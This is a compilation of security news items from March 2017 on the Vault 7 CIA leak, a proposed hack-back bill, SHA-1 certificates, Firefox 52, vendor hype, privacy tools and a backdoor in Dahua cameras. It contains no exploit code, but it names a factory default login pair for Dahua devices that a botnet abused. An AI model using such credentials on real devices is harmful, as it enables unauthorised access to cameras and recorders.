In response to the WikiLeaks CIA documents, Samsung released a statement that reads: "Protecting consumers' privacy and the security of our devices is a top priority at Samsung. We are aware of the report in question and are urgently looking into the matter."
WikiLeaks' CIA Leak Isn't Bigger than Snowden's NSA Leaks
The CIA isn't more advanced than the NSA TAO Team and Vault 7 leak isn’t even bigger than Snowden .
WikiLeaks claims the massive CIA hacking leak is larger than the Edward Snowden revelations about NSA's hacking and surveillance programs, but it is much much smaller.
While the Snowden revelations disclosed the global covert surveillance through text, the voice of people using hacking tools that permitted mass data gathering and analysis, the CIA data dump so far just shows that the CIA gathered and purchased tools that could be used to target individual devices.
However, there is no evidence of mass surveillance of smartphones or computers in the leaked documents. Technologically, the NSA is much more forward in sophistication and technical expertise than the CIA.
Ex-CIA Chief Says Wikileaks dump has made US 'less safe'
Vault7 — Ex-CIA Chief says CIA files leaked by Wikileaks is incredibly damaging and has put lives at risk.
Former CIA boss Michael Hayden said the latest leak of highly sensitive CIA documents and files by Wikileaks is "incredibly damaging" and has put lives at risk, BBC reports, while the CIA has not yet commented on the leaks.
The CIA revelations by the whistleblower organization are just beginning. People will see more revelations about the government and agencies from the WikiLeaks in coming days as part of its Year Zero leaks.
Proposed Bill Would Legally Allow Cyber Crime Victims to Hack Back
8.3.2017 thehackernews Cyber
Is it wrong to hack back in order to counter hacking attack when you have become a victim? — this has been a long time debate.
While many countries, including the United States, consider hacking back practices as illegal, many security firms and experts believe it as "a terrible idea" and officially "cautions" victims against it, even if they use it as a part of an active defense strategy.
Accessing a system that does not belong to you or distributing code designed to enable unauthorized access to anyone's system is an illegal practice.
However, this doesn't mean that this practice is not at all performed. In some cases, retribution is part of current defense offerings, and many security firms do occasionally hack the infrastructure of threat groups to unmask several high-profile malware campaigns.
But a new proposed bill intended to amend section 1030 of the Computer Fraud and Abuse Act that would allow victims of ongoing cyber-attacks to fight back against hackers by granting victims more powers to engage in active defense measures to identify the hacker and disrupt the attack.
The new bill has been proposed by Representative Tom Graves of Georgia and is named the "Active Cyber Defense Certainty" (ACDC) Act — a term that empowers victims to make use of "limited defensive measures that exceed the boundaries of one's network" in order to stop and identify digital attackers.
However, this new bill allowing hacking back attackers is already stirring up some concerns about potential unintended consequences.
Many argue…When we have legal authority to defend ourselves during a physical assault, then why not during a cyber attack by hacking back the attacker?
First of all, cyberspace doesn't work the way the physical world works, as online life moves at digital speeds. In the cyber world, there is a certain sense of helplessness.
Let's understand this by an example: In a home robbery, it is legal to defend your family from the attackers while waiting for the police authorities, since the robbers are in front of you and if you don't defend, a lot can happen in the several minutes in between.
But, if robbers robbed your house and ran away, you ran behind them and caught a person assuming him one of those, but can not actually identify.
What if he is really an innocent person who accidentally stumbled into your hands?
This is the major concern when hacking back targets innocent people, since attribution or identification of an attacker is tough in this cyber-universe.
But if passed, the ACDC Act will allow hacking victims to "access without authorization the computer of the attacker...to gather information...to establish attribution of criminal activity to share with law enforcement or to disrupt continued unauthorized activity against the victim's own network."
But What if a Botnet Affected System Used to Attack You?
It's important to note that there are some limitations. The proposed bill specifies that victims can access the attacker's computer without authorization, but to only gather information about their attackers and sharing it with law enforcement.
But, the bill doesn't allow hacking victims to perform activities such as destroying any information stored on the attacker's computer, causing physical damage to another person, or creating a threat that can endanger public health or safety. Well, that's commendable.
The limitation is because today so many compromised computers (botnet) are involved in cyber attacks that a hacking victim could rarely be certain they would be attacking the real attacker rather than an innocent victim.
Even worse, that compromised machine could also belong to a company that stores personal and/or financial information of its customers. So, accessing that data without authorisation would unintentionally compromise the confidentiality of the company's data.
"The first question that comes up with this, assuming you’re able to do it, is ‘Do you know who it is you would hack back against?'" said Ed McAndrew, an attorney with Ballard Spahr in Washington, and former federal cybercrime prosecutor.
"This is a real concern. You could have people hacking back at pivots (in an attack). Are you hitting back against an attacker or someone accidentally in the middle?"
Hacking Back is legal in your country, but What about Others Where your Attacker Resides?
This bill grants you authority to hack back, but if your attacker resides in the different country, you could face hacking charges in that nation by violating their law.
So, in this case, you inadvertently become a cyber criminal for that country.
What about the cyber crimes that will take place in the name of Hacking Back?
In the whole discussion, one can not neglect sophisticated hackers, who always found some ways to carry out internet crimes.
Today, when hacking back is illegal under the Computer Fraud and Abuse Act, it's quite easy for anyone to judge who is a criminal and who is a victim.
But, if made legal, Hacking back could provide broad affirmative defenses to hackers who get prosecuted, enabling them to use this law to cover their activity conveniently.
"Whatever you can convince a jury of is what truth is; that’s the view of a defense lawyer. The hacker could tell their story that they were doing this activity to aid law enforcement," said McAndrew. "You've got a lot of situations where I could envision a defendant saying they're doing this because they're trying to help law enforcement or assist victims."
Although the ACDC proposed bill is currently undergoing a phase of public discussion, you have a chance to provide your feedback and make recommendations for the draft law before Rep. Graves formally introduce it to the U.S. House of Representatives.
Here's the draft [PDF] of the proposed ACDC act.
1 in 5 Websites Still Use SHA-1: Report
8.3.2017 securityweek Safety
While most certificate authorities (CAs) haven’t been issuing certificates using the SHA-1 cryptographic hash function for more than two months, 1 in 5 websites worldwide still use such certificates, according to analysis by security firm Venafi.
Not only did CAs migrate to the more secure SHA-2 certificates on Jan. 1, 2017, but major browser makers also decided to adopt the change, including Google, Microsoft and Mozilla, and their browsers no longer trust sites that use SHA-1 certificates. Even Facebook announced plans to retire SHA-1.
Despite that, many webmasters are still behind with the transition, as 21% of all websites that use certificates still use the insecure cryptographic hash function, Venafi says, based on the analysis of over 33 million publicly visible IPv4 websites. Granted, things are looking much better compared to last fall, when 35% of websites were still using SHA-1, but recent research has proven that the crypto function is officially broken.
SHA-1 has been long said to be vulnerable to collision attacks, but it wasn’t until this year that the function was proven fundamentally broken. What’s surprising, however, is that webmasters didn’t transition to SHA-2 or SHA-3 sooner. It’s doubtful that they would knowingly leave their sites vulnerable.
“I suspect that many organizations may simply be unware that they still have any SHA-1 certificates on their networks because they are relying on certificate authority (CA) tools to manage their keys and certificates. The problem with this approach, especially now that free and very low cost certificates are widely available, is that anyone in your organization can get and install a certificate that uses weak hashing algorithms and install it on your network,” said Venafi’s Shelley Boose.
In addition to making both websites and their users vulnerable to attacks, the continuous use of SHA-1 can also disrupt the browsing experience, because web browsers display warnings when encountering insecure sites, prompting users to look for alternatives. The green padlock that browsers display to mark HTTPS transactions will no longer be associated with SHA-1 sites, and performance issues might also alter users’ experience, Venafi notes.
Firefox 52 Warns of Login Fields on Insecure Pages
8.3.2017 securityweek Safety
Released this week, the latest version of the Firefox Web browser warns users when they are entering their passwords on pages that are not secure.
The change was initially announced last year, when Mozilla introduced the warning in Firefox DevEdition 46, in an attempt to raise awareness on the risks that requesting sensitive information over non-secure connections pose. Last year, the warning was meant for developers, but the latest browser release brings it to end-users as well.
Starting with Firefox 52.0, users will receive a warning when encountering non-secure HTTP pages with logins. A “This connection is not secure” message will be automatically displayed when the user clicks into the username and password fields on any page that doesn’t use HTTPS.
Starting with the release of Firefox 51 in January, the browser has been displaying a struck-through lock icon for all pages that don’t use HTTPS, to make it clear that those pages are not secure. It even displayed a warning when users were entering a password on an insecure page. Now, the warning message is displayed as soon as the user clicks on the username or password field.
Firefox 52 also implements the Strict Secure Cookies specification, thus forbidding insecure HTTP sites from setting cookies with the “secure” attribute. In the newly published release notes, Mozilla explains that this change will prevent insecure sites from setting cookies with the same name as an existing “secure” cookie from the same base domain.
The browser update brings a variety of bug fixes as well, including patches for Critical issues: asm.js JIT-spray bypass of ASLR and DEP; Memory Corruption when handling ErrorResult; Use-after-free working with events in FontFace objects; Use-after-free using addRange to add range to an incorrect root object; Use-after-free working with ranges in selections; and memory safety bugs.
High risk vulnerabilities were also addressed in Firefox 52, such as: Segmentation fault in Skia with canvas operations; Pixel and history stealing via floating-point timing side channel with SVG filters; Memory corruption during JavaScript garbage collection incremental sweeping; and Use-after-free in Buffer Storage in libGLES (affecting Windows computers only).
Firefox 52.0 was released with support for all major desktop platforms, namely Linux, macOS, and Windows. Furthermore, it is part of the ESR (Extended Support Release) branch, meaning that it should receive support for about a year.
"Vault 7" Leak Shows CIA Learned From NSA Mistakes
8.3.2017 securityweek BigBrothers
WikiLeaks’ “Vault 7” release appears to confirm that the U.S. National Security Agency (NSA) was behind the threat actor tracked as the “Equation Group.” Documents also show that the Central Intelligence Agency (CIA) learned from the NSA’s mistakes after its activities were exposed by security researchers.
Files allegedly obtained from a high-security CIA network provide details on the intelligence agency’s vast hacking capabilities. One of the files made available by WikiLeaks contains a discussion thread titled “What did Equation do wrong, and how can we avoid doing the same?”
The operations of the Equation Group and its links to the NSA were detailed by Kaspersky Lab in February 2015, and the discussion made public by WikiLeaks was initiated a few days later.
Participants in the discussion pointed out that one of the NSA’s biggest mistakes was that its tools shared code, including custom cryptography, giving researchers the data needed to connect different malware to the same group.
“The ‘custom’ crypto is more of NSA falling to its own internal policies/standards which came about in response to prior problems,” one user wrote.
In addition to using the same custom cryptographic algorithm, the CIA identified several other mistakes made by the NSA, including the reuse of exploits, use of internal tool names in the code, and the use of a unique mutex.
“All their tools shared code. The custom RC5 was everywhere. The techniques for positive ID (hashing) was used in the same way in multiple tools across generations,” another user said.
“The shared code appears to be the largest single factor is allowing [Kaspersky Lab] to tie all these tools together. The acquisition and use of C&C domains was probably number 2 on the list, and I'm sure the [Computer Operations Group] infrastructure people are paying attention to this.”
The Vault 7 files show that in addition to learning from the NSA’s mistakes, the CIA “borrowed” techniques from in-the-wild malware and tools, including Shamoon, UpClicker and the Nuclear exploit kit.
Security firms have started assessing the impact of the exposed hacking capabilities. WikiLeaks has not released any exploits, which makes it difficult to determine exactly what the CIA programs are capable of. However, at first sight, the intelligence agency’s tools don’t appear to be very sophisticated.
Fighting Cyber Security F.U.D. and Hype
8.3.2017 securityweek Cyber
FUD and Cyber Security Vendor Marketing
Dr. Ian Levy is technical director at the UK’s National Cyber Security Center (NCSC), which is part of GCHQ. It is fair to say that the NCSC will play a major part in defining and delivering the UK government’s cyber security policy over the next few years.
In October 2016, Ian Levy reportedly made an unusual comment at the Wired Security conference in London. He said,
“If you’re told that cyber security attacks are purported by winged ninja cyber monkeys who sit in a foreign country who can compromise your machine just by thinking about it you’re going to have a fear response. And that’s where we are today. The security companies are incentivized to make it sound as scary as possible because they want you to buy their magic amulets.”
This was not a one-off sentiment voiced on-the-fly. He repeated it in February 2016:
“We are allowing massively incentivized companies to define the public perception of the problem. If you call it an advanced persistent threat, you end up with a narrative that basically says ‘you lot are too stupid to understand this and only I can possibly help you – buy my magic amulet and you’ll be fine.’ It’s medieval witchcraft, it’s genuinely medieval witchcraft.”
The security industry stands accused by the UK’s leading cyber security agency of over-hyping the cyber security threat to sell under-achieving products. It does this in two stages: firstly by defining the threat (by manipulating the media); and secondly by positioning its own product as the sole effective cure (by manipulating the buyer).
Manipulating the Media
The vendor/media relationship is a complex symbiosis. In the age of free news, each needs the other ― but there are well-known, if unspecified, rules. The primary rule is that the media must appear to be entirely independent of vendor influence, even when largely funded by vendor advertising.
The vendor industry is forced to manipulate the media subliminally ― and different parts of the media accept this subliminal manipulation to differing degrees.
Historically, the vendor’s primary tool has been the ‘press release’; but this is now supplemented by the vendor blog. The former is used to frame the company and its product; while the latter is used to frame the threat. The ultimate aim is to define the vendor as the sole cure for a dire threat; and to get the media to describe both in the vendor’s terms.
The serious media will genuinely seek the underlying truth in all it receives. But journalists have their own pressures: the need to write compelling copy that will attract the largest possible readership, and to do so repeatedly to very tight deadlines.
The first requirement (compelling copy) leads to the simple acceptance of new buzz words framed by the vendor to define a major new threat that it discovered, and by implication is best positioned to counter. It only takes a few major publications to use the term for it to rapidly become part of the security lexicon. Examples include kill chain, cyberwar, cyber pearl harbor, ‘perfect storm threatening Europe’, cyber 9/11 and many more.
Ian Levy singles out the use/misuse of ‘advanced persistent threat’ to describe everything. “He pointed out that a UK telco [TalkTalk] had recently been taken offline using a SQL injection flaw that was older than the hacker alleged to have used it. That’s not advanced by any stretch of the imagination, he said.” (TalkTalk originally described the attack as a ‘significant and sustained’ cyber assault.)
The second requirement (tight deadlines) is probably the primary cause of what is now known as ‘fake news’. For the most part, this is not a conspiracy to spread false rumors, but a failure to take sufficient time to check facts rather than simply trust sources.
Fake news is not new — it has existed for as long as there have been reporters. Examples include CNN’s 1999 report that Kevin Mitnick “hacked into the North American Defense Command (NORAD), a feat that inspired the 1983 film ‘War Games’.” He didn’t do that. And the late 2016 Washington Post headline, “Russian hackers penetrated U.S. electricity grid through a utility in Vermont, U.S. officials say.” That didn’t happen.
If Levy is correct, security vendors have been remarkably successful in subtly manipulating the media to frame the security threat in its own terms: that is, “cyber security attacks are purported by winged ninja cyber monkeys who sit in a foreign country who can compromise your machine just by thinking about it…” But he goes on to imply that the purpose of this manipulation is to make it easier to sell “magic amulets”. This last part requires manipulating the buyers into believing in the amulets.
Security Vendor HypeManipulating the Buyer
It is easy to forget that vendors are businesses, and their primary purpose is to make a profit. “I used to work selling security software,” comments Drew Koenig, now security solutions architect with Magenic. “The primary goal is not to solve the security problems, but sell you a product that you think can solve your security problems.”
Sales methods
It is the methods used to sell the product regardless of effectiveness that worry some buyers; and the ability to see through these methods only comes with experience. Martin Zinaich, information security officer with the City of Tampa, has found salesmen will not necessarily take his ‘no’ for an answer. “I actually find vendors, when I express my appreciation of their product but do not see a true business fit, will start calling my younger staff. They know the shiny stuff can win a sale.”
One vendor told him to use FUD (fear, uncertainty and doubt) to get budget to buy product. It didn’t work: “I never have and never will. The reality is the business relies on its professionals to act as such. If there is a real risk, we need to attack it. If there is perceived risk, we need to evaluate it.”
A second problem is that salesmen do not necessarily understand either the technicalities of the product they must sell, or the specific demands of the security market ― and resort to their own version of FUD or fibs to make a sale.
Malware researcher Rob Slade gave an example. At a vendor presentation, he was told this great new product will automatically make your products more secure. He asked if there was any assurance requirement that would mandate every developer use the product in a secure fashion. “The salesman gave a long-winded response,” said Slade, “that said you could use the product in a secure way, but, actually, it didn't require you to. In other words, he gave a verbose answer that boiled down to ‘no’. I strongly suspect that the presenter didn't know he was lying to me. He probably didn't even know what an assurance requirement was.”
Marketing budgets
Surprisingly, the size of security product marketing budgets is also seen as an issue. “Vendor marketing budgets are a massive problem,” says security author Raef Meeuwisse; “especially as the largest budgets are often backing the most out of date and ineffective security technologies. It often feels like the larger the ads, the less the vendor has to sell.” He believes that this has a direct effect on the size of the security market, because it “helps us buy security brands that have been around for a while rather than security solutions that often work considerably better.” The whole issue, he suggests, is then made worse by “commercial research companies whose business model requires that they only actively promote the companies paying in the most research money.”
Ilia Kolochenko, CEO of High Tech Bridge, points out that it isn’t just the budgets of the big firms that causes problems. “We should keep in mind that numerous VCs that appeared on the bubbling market of venture capital during the last few years are also responsible for hype and FUD in cyber security.”
Venture capital makes its money by buying low and selling high. It gambles that a new small company will become a big powerful company through increased sales before it cashes in on its investment. In short, venture capital is motivated by increasing sales rather than improving product. “Many of them,” explains Kolochenko, “put pressure on the company to increase sales by any means, selling to everyone, without really thinking if the client will get any benefit from their technology. This is why today many startups are trapped by easy-cash distributed by VCs, and now must spend all their time and other resources on aggressive sales rather than on technology. Entrepreneurs should remember that there is no free cash.”
But it’s not a new problem, and it doesn’t just apply to cyber security. “There’s a degree of sensationalism that product marketers have always applied, not just now,” comments Bill Burns, chief trust officer and cloud business transformation at Informatica. “They’re always looking for ‘an edge’ to capture the market’s attention.”
Fighting the F.U.D.
“It is the business, guided by our experience and input, which needs to make the final decision,” says Zinaich. “The fact is, more squirrels have taken out power around the globe than any hacker has to date. It is not even close. Yet, the fragile ‘House of Internet Things’ we are rapidly building is full of risk. That risk has to be managed in the light of reality, not by carnival barkers.”
There is an acceptance among security leaders that security vendors will hype the products and FUD the threat; and that it is down to the professionals’ own knowledge and experience to get to the right product for the right price for their own environment. “I've found the best approach is to leverage proof-of-concepts on every solution we are considering,” comments John Masserini, CISO at MIAX Options. “Not only does it vet the hype from the reality, but it also gives you a deep understanding of the operational impact the solution will have on your specific infrastructure. This is an often-overlooked aspect of many security solution providers and could be far more challenging than the risk you're trying to mitigate. Make them prove their functionality in your specific environment before ever signing a check."
Meeuwisse takes a similar view. “My main advice is this: security technology is moving so fast, don’t buy anything on an uncancellable multi-year deal. You never know when it will start to become an inferior or outdated product or service.”
Steve Lentz, chief security officer at Samsung Research America goes further ― he almost makes it personal. He doesn’t want a product that does what it says, he wants one that does more. “When I can get a vendor where I can trust that they will always do more, that is a big plus. This also includes that their support is top notch; and they better give me their best price the first time. If I have to keep haggling for a lower/best price they are out. If I have to send an email to their VP of Support and Sales, saying ‘your support sucks!’, they are out. If the vendor does what he says and more, and we prove that by first POCing and then purchasing, they usually stay in our security environment. I will renew as long as they keep this up.”
The best way to combat vendor hype and FUD, says Koenig, “is to know what your security problems are before you look at vendors to solve them. Only a business knows what problems you have ― a guy in a booth or cold calling you shouldn’t tell you what problems they think you have.”
When you fully understand the problems you have, he continues, “then go research the vendors yourself, hit the forums, ask your peers before you pick up the phone, talk to everyone but the vendor before you talk to the vendor. When it comes time to bring the vendor in always have the vendor prove it. Make them show the tools solving your problems, not a vendor made canned demo that will work 100% of the time showing you the buzzwords in action. Whatever you decide you will have to deal with it long after the sales team moves on. If you bring something in that doesn’t solve your problems, the vendor won’t be held accountable.”
‘Try before you buy’ is the repeated recommendation. Bill Burns thinks this is a new and growing option that may eventually solve the hype and FUD problem. “With the advent of mobile, SaaS and cloud computing, companies can now offer ‘trial versions’ of their software on the same infrastructure and offer the same user experience as the ‘real product’. Vendors can now show off their products ― warts and all ― directly to their target customers with the obligation to prove value in their product. The time between ‘awareness of an unmet need’ and ‘testing a solution’ is growing smaller quickly; good marketers know that relying on ‘hype’ will generate a negative reaction even faster than before.”
The Ultimate Solution
There is no ultimate solution. Salesmen will continue to sell the products they represent rather than the correct solutions. Publications will continue to seek readers by making their news stories as ‘interesting’ as possible. The combination will always drift towards Ian Levy’s winged ninja cyber monkeys; but if Bill Burns is correct, the new Information Age may make it a self-correcting issue through the democratization of information. The new element is the citizen journalist ― the independent blogger who does not hesitate to correct the professional journalist who makes a mistake, nor criticize a product that is over-hyped or inadequate. Independent blogs will keep both publications and vendors honest.
David Harley is both a security researcher and a prolific blogger. “There's no doubt that emotive language relating to warfare and/or epidemiology has long been a staple of security-related marketing (and journalism!). I can't say I like it – much of my career in security has been devoted to damping down the fires of hyperbole and advocating less drama and more precision,” he says.
“But I'm most concerned by the misuse of language in ways that are actually deceptive rather than everyday sloppiness. It annoys me (quite disproportionately) when a system is described as 'infected' when 'compromised [by some form of Trojan]' would be more accurate; or when people use 'virus' as a synonym for 'malware'. However, I regard it as frankly deceptive when people evade the distinction between 'successful attacks' and 'attempted attacks' because saying 'ten million systems were attacked' is more dramatic and makes a marketing point more effectively than adding that '0.001% of attacks were actually successful'...
Over time, bloggers like Harley could disarm, if not remove, the winged cyber ninja monkeys by keeping journalists honest and vendors truthful.
How to Browse The Internet Securely And Anonymously
8.3.2017 securityaffairs Security
These are some of the top methods you can use to browse the internet securely and anonymously.
Even as the world becomes more aware of the imminent threat to our online privacy, few people understand the need to hide crucial information, such as IP addresses and private data streams, from entities such as our Internet Service Providers (ISPs), various online advertising companies, and our governments. Thankfully, fortifying your online privacy is not rocket science.
With the array of online encryption tools such as IP Changer software, Virtual Private Networks, and the popular Tor Browser, internet users are not short of options. Herein are some of the best ways to browse the internet securely and anonymously.
Tor
The Onion Router, abbreviated and more commonly known as Tor, is one of the most sought after online anonymity tools. Tor focuses on making your location untraceable by masking your IP address under layers and layers of smokescreen and encryption to cover up the origins of your connection.
Already, a sizeable percentage of the internet is already using the Tor Browser – a modified version of the Mozilla Firefox Browser – to keep their identities hidden while on the internet. Not only does it act as an IP changer, it also keeps trackers at bay. Tor can be described as the most user-friendly option in this list, and also the most all-encompassing encryption tool since it integrates more than one encryption technique in the form of browser extensions to give users comprehensive online security. Being an open-source project, it is also completely free.
However, using the Tor browser will still require you to change your online behavior in order to retain maximum anonymity. It comes with a number of warnings, tips, and tricks that every privacy-conscious individual should follow when browsing the internet. Tor is not without its limitations but has so far proved to be the most viable option for people of all calibers.
Virtual Private Networks
VPNs are considered heavy-duty online anonymity tools for a reason. These services focus on helping users to disguise their traffic in addition to keeping their IP addresses hidden whenever they connect to the internet. They are also considered powerful IP changer software. VPNs are only able to encrypt internet traffic, though, meaning that users’ ISPs will still be able to see how much traffic you generate from website to website, but will not be able to see the actual content. The same applies to snooping governments and any malicious parties who may wish to steal your vital information such as login credentials.
The only catch is that a good VPN service will cost you. However, the expense can often be overlooked because this technique does not have a lot of weaknesses. If you’re living in a country where the government has sanctioned the blocking of all VPN connections, there are stealth VPNs that will allow you to browse the internet undetected. As such, VPNs are the preferred option for people living in countries with extreme internet censorship and heavy government surveillance.
Browser Extensions for Privacy
For much lighter, but just as effective online privacy, users can always choose to install a privacy-centric browser extension. At the top of the list of extensions users can get is Ghostery, which is compatible with Chrome, Firefox, and Internet Explorer, and EFF’s Privacy Badger. Unlike VPNs and Tor, browser extensions will not function as IP changer software since they do not hide your IP address.
The only notable difference between the two extensions is that Ghostery is more hands-on than Privacy Badger is. With Ghostery, you are allowed to tweak your privacy settings, such as which trackers to block. It also allows you to see all the trackers that are being used on you for every website that you visit, allowing you to choose which websites to show your information to and which to block out completely. It is quite handy when it comes to keeping advertisers from logging your information.
Privacy Badger, on the other hand, is a bit more intuitive than the former option. This extension monitors websites that are tracking your browsing habits and either block out the websites in total or keeps their tracking methods from working on you. Despite being based on an ad-blocking codebase, it does a lot more than just keep you safe from annoying ads. Its intuitive design allows it to learn from your browsing habits, meaning that you don’t have to constantly adjust the settings.
Changing Your IP Address
IP bans are the primary reason why people change their IP addresses. Whether a certain online service is not yet available in your country or you have been explicitly banned from a specific website, changing your IP address can be a viable way of gaining access to the website.
Methods range from the fairly complicated manual method, which involves resetting your modem or using different devices, to downloading IP changer software.
The latter option is often preferred over the former. IP changer software can be used to change your IP address multiple times even if you’re using the same device. Unlike other encryption services, however, IP changer software only alters your real IP address. The IP changer software will not mask your traffic or help you block any trackers; it simply displays a different IP address than the one that is actually assigned to you.
You might opt for IP changer software if your privacy needs are basic. It simply throws off your ISP and government on your real location, sometimes helping you circumvent government-imposed censorship and other bans put in place by your ISP. IP changer software is by no means a comprehensive option like Tor or VPNs, but it does work. You can choose from a wide range of IP changer software on the internet, or alternatively, you can go for a VPN service that provides the IP changer option to keep your real location well under wraps.
HTTPS Everywhere
Even as the whole internet is in the process of fully adopting SSL, there is still a notable percentage that does not support the security protocol. It is essential in keeping web traffic free from malicious interceptors. Web sites that still display unencrypted connections by default are significantly less safe.
The HTTPS browser extension allows users to force an HTTPS connection on countless websites. However, since it depends on the website users are connecting to, it is still a viable solution despite not being the best option in this list.
Many of these privacy-centric tools and software rely on IP changing tactics, masking your traffic, or securing your connections via a number of channels. You might not think you’re a target for hackers, but based on the indiscriminate hacking that is going on nowadays, it pays to take precautions.
Dahua Video Recorders and Cameras affected by a serious flaw. Is it a backdoor?
8.3.2017 securityaffairs Vulnerebility
The manufacture Dahua Technology has started releasing firmware updates fix a serious flaw in some models of its video recorders and IP cameras.
Security experts believe the flaw is a true backdoor that could be used to remotely access the user database containing usernames and hashed passwords.
The backdoor was discovered by a researcher that is known online as “bashis.”
Once the attacker gains the administrator credentials stored in the database, he can be used to log in to the device. Representatives at the company Dahua admitted the issue and classified it as a ‘coding issue’ that was not done intentionally.
Of course, the researcher who discovered the flaw expresses skepticism of the error claim.
According to an analysis shared by IPVM, the password hashes can be used directly to log in, in fact, there is no need to crack them.
Bashis did not report the issue to Dahua, initially, he also released a proof-of-concept (PoC) exploit code that was later removed by the researchers due to a request of the manufacturer.
On April 5, the researchers made against available online the PoC.
Dahua replied with a security bulletin that admits the presence of the error in the code of its devices.
“We were recently made aware of a cybersecurity vulnerability that affects certain Dahua recorders and IP cameras. It’s important to note that the vulnerability is not the result of a malicious attack on any specific installation where our products are deployed; it was discovered by Bashis conducting independent testing of various suppliers’ surveillance products.” reads the security bulletin.
The company published a list of vulnerable devices, users are invited to download and updated the firmware of their devices.
Model Number Where to Update Firmware
DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
Download Link
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
Download Link
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
Download Link
DHI-HCVR51A04HE-S3 Download Link
DHI-HCVR51A08HE-S3 Download Link
DHI-HCVR58A32S-S2 Download Link
Dahua is still investigating the issues, it is likely that other devices may be affected by the same issue.
The security of IoT devices is crucial, recently I reported in exclusive the news of a large-scale attack launched by a criminal gang leveraging the SSH TCP direct forward attack technique through a thingbot.
According to a report published by FlashPoint, the recent attacks on the Mirai botnet involved a huge number of Dahua devices.
The researchers explained that the botnet was mainly composed of video surveillance devices manufactured by Dahua Technology.
“While investigating the recent large-scale distributed denial-of-service (DDoS) attacks, Flashpoint identified the primary manufacturer of the devices that utilize the default username and password combination known as root and xc3511.” reads a report published by Flashpoint. “The Dahua devices were identified early because of their distinctive interface and recent use in other botnets. Utilizing the “botnets. Utilizing the “Low Impact Identification Tool” or LIFT, Flashpoint was able to identify a large number of these devices in the attack data provided.” states the report.
Američtí hackeři se dokážou vydávat za Rusy, naznačují dokumenty WikiLeaks
8.3.2017 Novinky/Bezpečnost BigBrother
Z dokumentů zveřejněných organizací WikiLeaks vyplývá, že má CIA zvláštní hackerskou jednotku, která si osvojila techniky zahraničních protějšků z Ruska a Číny. To znamená, že dokáže po útocích na informační systémy zanechávat jejich stopy a svést tak vinu na ně. Jednotka se jmenuje Umbrage (pohoršení). Pravost dokumentů nicméně zatím nebyla potvrzena.
Pokud se ale informace potvrdí, bude to mít zásadní vliv na vyšetřování údajných ruských hackerských útoků během americké předvolební kampaně s cílem ovlivnit její výsledek. Pro veřejnost by to de facto znamenalo jediné; věřit může, komu chce, protože lhát může kdokoliv, poznamenal server Wired.
ČTK v této souvislosti konstatovala, že americká média zmíněné digitální stopy přirovnávají například ke kulkám nalezeným na místě činu, které jsou forenzní experti schopni jednoznačně přiřadit ke konkrétní zbrani.
Spekulace o tom, zda CIA nevykonstruovala útoky z Ruska, aby se tím pokusila zabránit zvolení Donalda Trumpa do Bílého domu, se vynořily bezprostředně poté, co Wikileaks téměř devět tisíc stran dokumentů zveřejnila.
Celou věc je však možné také obrátit. O tom, že utajované americké dokumenty WikiLeaks účelově předávají Rusové, se v médiích spekuluje již od počátku.
V úterý zveřejněné dokumenty zmiňují také to, že je CIA schopna pozměnit takřka jakékoliv chytré elektronické zařízení ve špiclovací nástroj. Ať už jde o iPhone, mobil s operačním systémem Android, počítač s Windows nebo televizi Samsung.
Celkem mají mít WikiLeaks nově k dispozici téměř 9000 dokumentů. To je víc, než kolik jich reportérům předal někdejší spolupracovník CIA Edward Snowden.
Přední výrobci se vyjádřili k úniku dat z CIA
8.3.2017 Novinky/Bezpečnost BigBrother
Apple, Samsung a Microsoft reagují na aktuální kauzu Wikileaks vs CIA.
Portál Wikileaks v úterý zveřejnil tisíce dokumentů CIA popisujících techniky kyberšpionáže, jakými zpravodajci skrz chyby v softwaru chytrých telefonů či televizí nezákonně odposlouchávali subjekty po celém světě.
A zatímco na politické úrovni se světové špičky přou o autentičnost informací, ke skandálu se už vyjádřili i přední výrobci údajně zneužitých zařízení.
Nejpodrobnější vyjádření vydal Apple, podle kterého technologie použitá v iPhonech představuje v současnosti „nejlepší možné zabezpečení“, s tím, že firma na jejím dalším zdokonalování nadále pracuje. Skoro 80 % majitelů iPhonů přitom pracuje s nejaktuálnějším operačním systémem.
„Naše prvotní analýza ukázala, že velká část mezer, které měly být zneužity, byla při poslední aktualizaci záplatována, a jestliže přijdeme na nějaké nové, okamžitě na nich začneme pracovat. Naše zákazníky vždy vyzýváme k tomu, aby si stáhnuli poslední verzi iOS a měli své zařízení zabezpečené co nejlépe,“ stojí ve zprávě Applu.
Samsung, kterému se CIA měla nabourat do televizorů řady F8000 skrze software, na jehož vývoji se podílela i britská MI5, byl stručnější.
„Ochrana soukromí našich zákazníků je pro nás top prioritou. Zveřejněnými informacemi jsme se proto okamžitě začali zabývat.“
Dle dokumentů však CIA rovněž vyvinula malware, který měl útočit na počítače s operačním systém Windows, na což Microsoft reagoval podobně stručně s tím, že se už „záležitostí zabývá“. Kdo se ke kauze zatím nevyjádřil, jsou Google a Linux Foundation – CIA prý měla útočit jak na telefony s Androidem, tak na počítače s linuxovými distribucemi.
Samotná CIA zatím pravost dokumentů datovaných do let 2013 – 2016 nepotvrdila, její bývalý šéf Michael Hayden však uvedl, že pokud jsou pravé, představuje takový únik snížení bezpečnosti jak Spojených států, tak jejich spojenců. Experti se však shodují, že nejde o nic překvapivého.
„Nejde o to, že CIA špehuje lidi. Samozřejmě, že je špehuje. Koneckonců, to je její práce. Řešit by se mělo v prvé řadě to, že se někdo naboural do jejího systému, vytáhl z něj spousty materiálů a ukázal je světu. A svět teď chce vědět, kdo to byl, jak to udělal a proč,“ komentoval Nicholas Weaver, bezpečnostní odborník z Institutu počítačové vědy v Berkeley.
A jisté je také to, že únik dat detailně popisujících utajované metody zpravodajců, pro CIA představuje obrovský problém. Nejen proto, že únik dat z agentury, která má získávat data od jiných, je jistým druhem potupy, ale také proto, že citlivé cíle teď můžou velice snadno změnit své návyky, aby zpravodajcům jejich práci dále ztížili.
Backdoor Found in Dahua Video Recorders, Cameras
8.3.2017 securityweek Vulnerebility
Video surveillance company Dahua Technology has started releasing firmware updates to address a serious vulnerability in some of its video recorders and IP cameras.
The flaw was discovered by a researcher with the online moniker “bashis.” The expert, who has classified the issue as a backdoor, noticed that he could remotely download a device’s complete user database, including usernames and password hashes.
The administrator credentials stored in the database can be used to log in to the device. IPVM reported that the password hashes can be used directly to log in, without the need to crack them (i.e. pass the hash attack).
